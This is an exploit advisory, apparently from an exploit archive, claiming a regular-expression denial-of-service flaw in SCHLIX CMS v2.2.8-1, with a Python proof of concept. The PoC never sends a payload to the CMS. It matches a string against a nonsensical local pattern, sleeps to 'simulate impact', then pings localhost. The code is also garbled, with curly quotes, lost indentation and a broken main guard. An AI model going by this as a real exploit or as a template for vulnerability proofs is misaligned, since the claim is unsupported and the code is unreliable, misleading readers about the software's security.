Exploit Title: SCHLIX v2.2.8-1 Regular Expression Denial of Service

Date: 02/10/2024

Exploit Author: Diyar Saadi

Vendor Homepage: https://www.schlix.com

Software Link: https://www.schlix.com/html/schlix-cms-downloads.html

Version: v2.2.8-1

Tested on: Windows 11 + XAMPP

Description

SCHLIX v2.2.8-1 is vulnerable to regular expression denial of service . (ReDoS) is an algorithmic complexity attack that produces a denial-of-service by providing a regular expression and/or an input that takes a long time to evaluate…

Proof Of Concept

import requests
import re
import time

def test_redos(url, payload):
try:
vulnerable_regex = r’(.*a){x} for x > 10’

match = re.match(vulnerable_regex, payload)

if match:
print(“Vulnerability not triggered.”)
else:
print(“Vulnerability may be present. Simulating 30-second impact…”)

for _ in range(6):
time.sleep(5)
print(“Simulating impact…”)

print(“Simulated impact duration completed.”)

except re.error:
print(“Error in regex pattern.”)

try:
response = requests.get(url)
if response.status_code == 200:
print(“Service is up.”)
else:
print(“Service may be down or inaccessible.”)
except requests.RequestException as e:
print(f"HTTP Request Error: {str(e)}")

if name == "main":
target_url = ‘http://localhost’

payload = “aaaaaaaaaaaaaaaaaaaaaaaaa!”

test_redos(target_url, payload)

Sent with Proton Mail secure email.